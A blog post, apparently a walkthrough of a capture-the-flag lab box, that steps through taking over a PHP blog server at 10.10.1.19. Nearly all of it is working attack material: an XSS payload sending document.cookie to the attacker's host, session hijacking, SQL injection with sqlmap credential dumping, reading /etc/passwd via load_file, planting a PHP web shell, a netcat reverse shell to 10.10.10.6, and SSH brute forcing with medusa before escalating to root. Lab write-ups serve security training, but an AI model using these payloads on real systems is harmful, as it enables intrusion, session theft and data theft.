Black Box - BB2 XSS from cookie: (My Blog - 10.10.1.19)
  1. Open Burp, click on options and scan the application.
*nmap 10.10.1.19 –F (port 80, 22 are open)
* nikto –h 10.10.1.19 (Apache/2.2.16 (Debian), PHP/5.3.3-7+squeeze18).


  1. As I see at the URL, there are only 2 id options:
    http://10.10.1.19/post.php?id=1
    http://10.10.1.19/post.php?id=2
    The third id option is an error: ERROR: INTEGER REQUIRED.


  2. In id 1 or 2 there is an option to XSS choose and ID and check the form, the step is to look after injection point, fill the form and check the response.



  3. ID number 3 back that mean the injection point is in Text box.
  4. Try to insert a script inside, there is a login to admin, try to use cookie script to get admin's cookie session.
    * python –m SimpleHTTPServer
    and insert a script to the text box on the page:
    * <script>new Image().src="http://10.10.10.6:8000/a.php?cookie="+encodeURI(document.cookie);</script>

  5. Copy the PHPSESSID
    PHPSESSID=5j6hmv09krd85m6j2mfkrume12
    Paste in Tamper Data / Cookie Manager and click admin / try to login.

  6. Check the control panel and try to edit a post.


  1. We can try SQL injection
Boolean Proof:
http://10.10.1.19/admin/edit.php?id=2%20and%201=0 False
http://10.10.1.19/admin/edit.php?id=2%20and%201=1 True


http://10.10.1.19/admin/edit.php?id=1%20union%20select%201,2,3,4
  1. Try to use a high id or not exist one like -1 or 100
    check what you get:
    http://10.10.1.19/admin/edit.php?id=-1%20union%20select%201,2,3,4
  1. We would like to know more information like user() version(), database()
  1. With sqlmap find the admin password. We need to use cookie:
    sqlmap -u http://10.10.1.19/admin/edit.php?id=-1 -D blog -T users --columns --cookie=PHPSESSID=4gaol0csg9ai0qva1qrb3bbfv7 --dump

    Username: admin
    Password: P4ssw0rd



We can use the option load_file(“path”) to see files:
load_file("/etc/passwd") or /etc/group or /etc/services
  1. Open dirbuster to view all the folders and look after writeable folder to write a file there.

  2. http://10.10.1.19/admin/edit.php?id=-1 union select "<?php system($_GET['c']);?>",2,3,4 into dumpfile '/var/www/images/text4.php'

  3. checking the file (we have a half shell)
  1. Open a session with nc for more comfortable work from the command line
    http://10.10.1.19/images/text4.php?c=nc -n 10.10.10.6 1235 -e /bin/bash


  2. After several days, I didn’t find an exploit. I hacked the user with medusa:
    medusa -u user -P rockyou.txt -h 10.10.1.19 -M ssh

The Password is live.
  1. Try to login to ssh user@10.10.1.19 (Password: live)
  2. Sudo su
  3. And I am user root!
Share To:
Next
LAMPSecurity CTF8 - Walkthrough
Previous
This is the last post.

Fabio Lior Rahamim